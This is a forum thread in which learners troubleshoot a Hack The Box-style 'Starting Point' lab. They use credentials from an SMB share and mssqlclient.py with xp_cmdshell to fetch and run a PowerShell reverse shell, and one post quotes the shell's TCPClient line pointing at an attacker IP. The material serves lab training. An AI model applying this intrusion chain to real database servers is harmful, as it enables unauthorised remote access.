After executing xp_cmdshell command I’m not getting any output. i have changed the IP address in DownloadString to my IP address also. Can anyone help me out with this?
same issue i am also facing. stuck on this point.
do you have the http server and the nc open in their own separate terminals?
Have you been returned to the
SQL> prompt? If that hasn’t returned, try looking at one of your other terminal windows. I was stuck on this for ages.
also, did you change the IP address in the powershell reverse shell?
$client = New-Object System.Net.Sockets.TCPClient(“10.10.14.3”,443) ← change this too if not
Currently, I’m running into this issue. Below is the following setup I have for this project.
The filename.ovpn Loads as intended and it is located with the Starting Point folder
The smbclient access the backups folder for 10.10.10.27 and I’m able to get the prod.dtsConfig to obtain the password and user ID.
Within the impacket example folder, I use the python script mssqlclient.py with the User ID and the starting point IP. This allows me to enter in the password and processed to the xp cmdshell command with the SQL command line. After I enter the command in the terminal to download and execute the reverse shell. After entering this command the 443 port listener doesn’t respond to the xp cmdshell command.
On this terminal, I’m located in the Starting Point folder and I start the http server with port 80. After starting this command I go to the browser and type localhost and I observe the files located their. They are prod.dtsConfig, shell.ps1, and filename.ovpn In addition the shell.ps1’s IP is set to mine and not the 10.10.10.27 IP.
While located within the Starting Point folder I start the netcat command to listen on port 443.
Conclusion of the issue
When I enter the xp cmdshell command in Terminal 3 no response occurs within Terminal 5 netcat listener. This is stopping the process at the end of the Foothold on the Starting Point Tutorial. Does anyone know what I’m doing wrong in the tutorial and what the solution is? Thanks in advance.